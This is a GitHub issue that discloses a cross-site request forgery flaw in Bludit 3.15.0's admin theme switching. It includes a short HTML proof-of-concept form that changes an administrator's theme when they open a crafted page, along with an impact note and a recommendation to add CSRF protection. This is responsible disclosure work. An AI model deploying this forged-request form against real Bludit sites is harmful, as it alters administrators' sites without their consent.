We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A Cross-Site Request Forgery (CSRF) vulnerability has been identified within the admin theme selection functionality.
Steps to Reproduce:
Crafted a Proof of Concept (POC) demonstrating CSRF exploit for selecting the alternative theme. Example:
<html> <form enctype="text/plain" method="GET" action="https://localhost/bludit/admin/install-theme/alternative"> <table> <tr> <td></td> <td><input type="text" value="Change Theme For PoC" name=""></td> </tr> </table> <input type="submit" value="https://localhost/bludit/admin/install-theme/alternative"> </form> </html>
Note: Replace /alternative with /popeye or /blogx to target different themes.
/alternative
/popeye
/blogx
Impact: When a logged-in admin interacts with the crafted HTML page, the site's theme can be changed without their consent.
Recommendation: Implement CSRF protection mechanisms to mitigate unauthorized theme changes.
3.15.0
PHP Version 8.2.12.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Describe your problem
A Cross-Site Request Forgery (CSRF) vulnerability has been identified within the admin theme selection functionality.
Steps to Reproduce:
Crafted a Proof of Concept (POC) demonstrating CSRF exploit for selecting the alternative theme.
Example:
Note: Replace
/alternative
with/popeye
or/blogx
to target different themes.Impact:
When a logged-in admin interacts with the crafted HTML page, the site's theme can be changed without their consent.
Recommendation:
Implement CSRF protection mechanisms to mitigate unauthorized theme changes.
Bludit version
3.15.0
PHP version
PHP Version 8.2.12.
The text was updated successfully, but these errors were encountered: